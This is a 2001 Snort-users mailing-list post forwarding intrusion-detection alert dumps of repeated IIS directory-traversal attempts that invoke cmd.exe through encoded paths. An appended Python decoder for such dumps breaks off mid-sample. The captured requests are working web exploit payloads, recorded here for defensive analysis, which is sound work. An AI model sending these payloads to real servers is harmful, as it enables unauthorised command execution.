[Snort-users] RE: SadMind rule

Steve Halligan agent33 at ...187...
Wed May 9 15:01:56 EDT 2001


Here is the sadmind worm failing to get into my server.

-----Original Message-----
From: Steve Halligan [mailto:agent33 at ...2000...]
Sent: Tuesday, May 08, 2001 9:24 AM
To: INCIDENTS at ...220...
Subject: 4 similar IIS attempts in a 48 hour period.


I got these 4 attempts from different sources in a rather small window of
time.  They all start out with a portscan of port 80, so I don't think it is
the same person (Why would they need to rescan each time?).  You will note
that the order of the variation of the attempts is similar.  Is this a new
worm?  A new tool?

-Steve

----------------BEGIN SCAN REPORTS----------------------
*****************************SCAN #1*****************************************
------------------------------------------------------------------------------
#(1 - 2059) [2001-05-05 21:20:45] 305
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=19427 flags=0 offset=0 TTL=243 chksum=810
TCP:  port=41385 -> dport: 80  flags=******S* seq=3959699664
      ack=0 off=6 res=0 win=8760 urp=0 chksum=30305
      Options:
       #1 - MSS len=4 data=05B40000
Payload: none
------------------------------------------------------------------------------
#(1 - 2081) [2001-05-06 12:06:16] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59795 flags=0 offset=0 TTL=242 chksum=26174
TCP:  port=42384 -> dport: 80  flags=***AP*** seq=4087665554
      ack=2688221853 off=5 res=0 win=8760 urp=0 chksum=5135
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2082) [2001-05-06 12:06:17] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59801 flags=0 offset=0 TTL=242 chksum=26168
TCP:  port=42746 -> dport: 80  flags=***AP*** seq=4111537358
      ack=2688221866 off=5 res=0 win=8760 urp=0 chksum=54038
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2083) [2001-05-06 12:06:18] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59807 flags=0 offset=0 TTL=242 chksum=26162
TCP:  port=43046 -> dport: 80  flags=***AP*** seq=4129406045
      ack=2688221880 off=5 res=0 win=8760 urp=0 chksum=10502
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2084) [2001-05-06 12:06:19] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59813 flags=0 offset=0 TTL=242 chksum=26156
TCP:  port=44051 -> dport: 80  flags=***AP*** seq=4191243658
      ack=2688221889 off=5 res=0 win=8760 urp=0 chksum=32107
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2085) [2001-05-06 12:06:20] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59819 flags=0 offset=0 TTL=242 chksum=26150
TCP:  port=45036 -> dport: 80  flags=***AP*** seq=4254676574
      ack=2688221904 off=5 res=0 win=8760 urp=0 chksum=40111
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2086) [2001-05-06 12:06:21] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59825 flags=0 offset=0 TTL=242 chksum=26144
TCP:  port=45723 -> dport: 80  flags=***AP*** seq=3643186
      ack=2688221913 off=5 res=0 win=8760 urp=0 chksum=10686
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2087) [2001-05-06 12:06:22] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59831 flags=0 offset=0 TTL=242 chksum=26138
TCP:  port=46489 -> dport: 80  flags=***AP*** seq=54010263
      ack=2688221922 off=5 res=0 win=8760 urp=0 chksum=43352
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2088) [2001-05-06 12:06:23] 62
IPv4: 207.51.58.7 -> xx.xxx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59837 flags=0 offset=0 TTL=242 chksum=26132
TCP:  port=47320 -> dport: 80  flags=***AP*** seq=104581118
      ack=2688221936 off=5 res=0 win=8760 urp=0 chksum=64664
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2089) [2001-05-06 12:06:24] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59843 flags=0 offset=0 TTL=242 chksum=26126
TCP:  port=48175 -> dport: 80  flags=***AP*** seq=160395667
      ack=2688221939 off=5 res=0 win=8760 urp=0 chksum=18734
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2090) [2001-05-06 12:06:25] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=109 ID=59849 flags=0 offset=0 TTL=242 chksum=26117
TCP:  port=49033 -> dport: 80  flags=***AP*** seq=213665368
      ack=2688221947 off=5 res=0 win=8760 urp=0 chksum=38432
Payload:  length = 63

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 65 30 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   e0../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A      ir HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2091) [2001-05-06 12:06:26] 62
IPv4: 207.51.58.7 -> xx.xx.xxx.xx
      hlen=5 TOS=0 dlen=112 ID=59855 flags=0 offset=0 TTL=242 chksum=26108
TCP:  port=49954 -> dport: 80  flags=***AP*** seq=270239886
      ack=2688221961 off=5 res=0 win=8760 urp=0 chksum=37899
Payload:  length = 64

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0   GET /scripts/...
010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   ...../winnt/syst
020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A   dir HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2092) [2001-05-06 12:06:27] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=115 ID=59861 flags=0 offset=0 TTL=242 chksum=26099
TCP:  port=50870 -> dport: 80  flags=***AP*** seq=328007726
      ack=2688221972 off=5 res=0 win=8760 urp=0 chksum=16280
Payload:  length = 65

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F8   GET /scripts/...
010 : 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73   ....../winnt/sys
020 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
030 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D   +dir HTTP/1.0...
040 : 0A                                                .
------------------------------------------------------------------------------
#(1 - 2093) [2001-05-06 12:06:28] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=118 ID=59867 flags=0 offset=0 TTL=242 chksum=26090
TCP:  port=51840 -> dport: 80  flags=***AP*** seq=378946693
      ack=2688221985 off=5 res=0 win=8760 urp=0 chksum=15453
Payload:  length = 66

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E FC   GET /scripts/...
010 : 80 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79   ......./winnt/sy
020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F   stem32/cmd.exe?/
030 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   c+dir HTTP/1.0..
040 : 0D 0A                                             ..
------------------------------------------------------------------------------
#(1 - 2094) [2001-05-06 12:06:29] 56
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=135 ID=59873 flags=0 offset=0 TTL=242 chksum=26067
TCP:  port=52623 -> dport: 80  flags=***AP*** seq=427404423
      ack=2688221992 off=5 res=0 win=8760 urp=0 chksum=12179
Payload:  length = 77

000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 65 30   GET /msadc/..%e0
010 : 2E 2E 2F 2E 2E 66 2E 2E 2E 2E 2F 2E 2E 30 25 38   ../..f..../..0%8
020 : 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33   ../winnt/system3
030 : 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72   2/cmd.exe?/c+dir
040 : 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A             HTTP/1.0....



****************************SCAN #2*******************************************
------------------------------------------------------------------------------
#(1 - 2075) [2001-05-06 11:25:12] 317
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=33343 flags=0 offset=0 TTL=239 chksum=31438
TCP:  port=56344 -> dport: 80  flags=******S* seq=823530689
      ack=0 off=6 res=0 win=8760 urp=0 chksum=50416
      Options:
       #1 - MSS len=4 data=05B40000
Payload: none
------------------------------------------------------------------------------
#(1 - 2121) [2001-05-06 18:08:07] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24567 flags=0 offset=0 TTL=239 chksum=40155
TCP:  port=57118 -> dport: 80  flags=***AP*** seq=3412786496
      ack=2693431821 off=5 res=0 win=8760 urp=0 chksum=846
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2122) [2001-05-06 18:08:07] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24573 flags=0 offset=0 TTL=239 chksum=40149
TCP:  port=57170 -> dport: 80  flags=***AP*** seq=3415977274
      ack=2693431825 off=5 res=0 win=8760 urp=0 chksum=22034
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2123) [2001-05-06 18:08:18] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24582 flags=0 offset=0 TTL=239 chksum=40140
TCP:  port=57326 -> dport: 80  flags=***AP*** seq=3426276033
      ack=2693431836 off=5 res=0 win=8760 urp=0 chksum=12048
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2124) [2001-05-06 18:08:18] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24587 flags=0 offset=0 TTL=239 chksum=40135
TCP:  port=64799 -> dport: 80  flags=***AP*** seq=3904402609
      ack=2693431838 off=5 res=0 win=8760 urp=0 chksum=16549
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2125) [2001-05-06 18:08:28] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24596 flags=0 offset=0 TTL=239 chksum=40126
TCP:  port=65302 -> dport: 80  flags=***AP*** seq=3936366689
      ack=2693431853 off=5 res=0 win=8760 urp=0 chksum=37071
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2126) [2001-05-06 18:08:29] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24602 flags=0 offset=0 TTL=239 chksum=40120
TCP:  port=39706 -> dport: 80  flags=***AP*** seq=107054918
      ack=2693431871 off=5 res=0 win=8760 urp=0 chksum=30028
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2127) [2001-05-06 18:08:29] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24608 flags=0 offset=0 TTL=239 chksum=40114
TCP:  port=39709 -> dport: 80  flags=***AP*** seq=107263367
      ack=2693431881 off=5 res=0 win=8760 urp=0 chksum=22274
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2128) [2001-05-06 18:08:29] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24614 flags=0 offset=0 TTL=239 chksum=40108
TCP:  port=39965 -> dport: 80  flags=***AP*** seq=124410128
      ack=2693431890 off=5 res=0 win=8760 urp=0 chksum=45410
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2129) [2001-05-06 18:08:30] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24620 flags=0 offset=0 TTL=239 chksum=40102
TCP:  port=40329 -> dport: 80  flags=***AP*** seq=148806580
      ack=2693431906 off=5 res=0 win=8760 urp=0 chksum=26790
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2130) [2001-05-06 18:08:34] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=109 ID=24629 flags=0 offset=0 TTL=239 chksum=40090
TCP:  port=40585 -> dport: 80  flags=***AP*** seq=164770468
      ack=2693431910 off=5 res=0 win=8760 urp=0 chksum=63492
Payload:  length = 63

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 65 30 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   e0../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A      ir HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2131) [2001-05-06 18:08:34] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=112 ID=24635 flags=0 offset=0 TTL=239 chksum=40081
TCP:  port=43268 -> dport: 80  flags=***AP*** seq=341732227
      ack=2693431920 off=5 res=0 win=8760 urp=0 chksum=61755
Payload:  length = 64

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0   GET /scripts/...
010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   ...../winnt/syst
020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A   dir HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2132) [2001-05-06 18:08:38] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=115 ID=24642 flags=0 offset=0 TTL=239 chksum=40071
TCP:  port=43341 -> dport: 80  flags=***AP*** seq=346538415
      ack=2693431963 off=5 res=0 win=8760 urp=0 chksum=50319
Payload:  length = 65

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F8   GET /scripts/...
010 : 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73   ....../winnt/sys
020 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
030 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D   +dir HTTP/1.0...
040 : 0A                                                .
------------------------------------------------------------------------------
#(1 - 2133) [2001-05-06 18:08:38] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=118 ID=24648 flags=0 offset=0 TTL=239 chksum=40062
TCP:  port=46205 -> dport: 80  flags=***AP*** seq=530846163
      ack=2693431970 off=5 res=0 win=8760 urp=0 chksum=42548
Payload:  length = 66

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E FC   GET /scripts/...
010 : 80 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79   ......./winnt/sy
020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F   stem32/cmd.exe?/
030 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   c+dir HTTP/1.0..
040 : 0D 0A                                             ..
------------------------------------------------------------------------------
#(1 - 2134) [2001-05-06 18:08:42] 56
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=135 ID=24656 flags=0 offset=0 TTL=239 chksum=40037
TCP:  port=46362 -> dport: 80  flags=***AP*** seq=541605131
      ack=2693431981 off=5 res=0 win=8760 urp=0 chksum=56033
Payload:  length = 77

000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 65 30   GET /msadc/..%e0
010 : 2E 2E 2F 2E 2E 66 2E 2E 2E 2E 2F 2E 2E 30 25 38   ../..f..../..0%8
020 : 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33   ../winnt/system3
030 : 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72   2/cmd.exe?/c+dir
040 : 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A             HTTP/1.0....

***************************SCAN #3**********************************************************

------------------------------------------------------------------------------
#(1 - 2147) [2001-05-07 02:22:21]  spp_portscan: PORTSCAN DETECTED from 210.107.187.10 (THRESHOLD 4 connections exceeded in 0 seconds)
IPv4: 210.107.187.10 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=22549 flags=0 offset=0 TTL=238 chksum=30652
TCP:  port=50799 -> dport: 80  flags=******S* seq=2338995863
      ack=0 off=6 res=0 win=8760 urp=0 chksum=10291
      Options:
       #1 - MSS len=4 data=05B40000
Payload: none
------------------------------------------------------------------------------
#(1 - 2181) [2001-05-07 12:01:30]  WEB-IIS cmd.exe access
IPv4: 210.107.187.10 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=34657 flags=0 offset=0 TTL=238 chksum=18485
TCP:  port=61125 -> dport: 80  flags=***AP*** seq=941135384
      ack=2710126730 off=5 res=0 win=8760 urp=0 chksum=106
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2182) [2001-05-07 12:01:31]  WEB-IIS cmd.exe access
IPv4: 210.107.187.10 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=34663 flags=0 offset=0 TTL=238 chksum=18479
TCP:  port=61278 -> dport: 80  flags=***AP*** seq=951451170
      ack=2710126742 off=5 res=0 win=8760 urp=0 chksum=39492
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....


************************SCAN #4*******************************************
#(1 - 2150) [2001-05-07 03:07:07] 340
IPv4: 202.107.211.177 -> 209.46.94.80
      hlen=5 TOS=0 dlen=44 ID=45585 flags=0 offset=0 TTL=230 chksum=5406
TCP:  port=56725 -> dport: 80  flags=******S* seq=3486124858
      ack=0 off=6 res=0 win=8760 urp=0 chksum=61287
      Options:
       #1 - MSS len=4 data=05B40000
Payload: none
------------------------------------------------------------------------------
#(1 - 2173) [2001-05-07 10:15:58] 62
IPv4: 202.107.211.177 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=18435 flags=0 offset=0 TTL=230 chksum=32492
TCP:  port=32840 -> dport: 80  flags=***AP*** seq=1452480610
      ack=2704182929 off=5 res=0 win=8760 urp=0 chksum=28623
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
------------------------------------------------------------------------------
#(1 - 2174) [2001-05-07 10:16:00] 62
IPv4: 202.107.211.177 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=18441 flags=0 offset=0 TTL=230 chksum=32486
TCP:  port=33972 -> dport: 80  flags=***AP*** seq=1515064652
      ack=2704182931 off=5 res=0 win=8760 urp=0 chksum=30179
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
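A defender-side decoder for alert dumps in this format, added here as an example and not part of Steve's post: it rebuilds each request from the hex columns, percent- and UTF-8-decodes the path the way a permissive server would, and labels the encoding trick each request used, so the "order of the variation" can be compared across scans mechanically rather than by eye. SAMPLE_ALERTS is constructed by copying two records from scan #1 above; the trick names are labels I chose, not Snort's.

```python
"""Decode Snort alert hex dumps like the ones quoted above and classify each
request's traversal-encoding trick.  Added example, not code from the post;
SAMPLE_ALERTS is constructed by copying two records from scan #1 above."""
import re

RECORD_HDR = re.compile(r"^#\(\d+ - (\d+)\) \[([^\]]+)\]")
DUMP_LINE = re.compile(r"^\s*[0-9A-Fa-f]{3} : ((?:[0-9A-Fa-f]{2} ?){1,16})")
PCT = re.compile(rb"%([0-9A-Fa-f]{2})")        # well-formed %XX escape
BAD_PCT = re.compile(rb"%(?![0-9A-Fa-f]{2})")   # '%' not followed by two hex digits
# UTF-8 lead-byte ranges -> sequence length, including the obsolete 5/6-byte forms
LEAD = ((2, 0xC0, 0xDF), (3, 0xE0, 0xEF), (4, 0xF0, 0xF7), (5, 0xF8, 0xFB), (6, 0xFC, 0xFD))

SAMPLE_ALERTS = """\
#(1 - 2091) [2001-05-06 12:06:26] 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0   GET /scripts/...
010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   ...../winnt/syst
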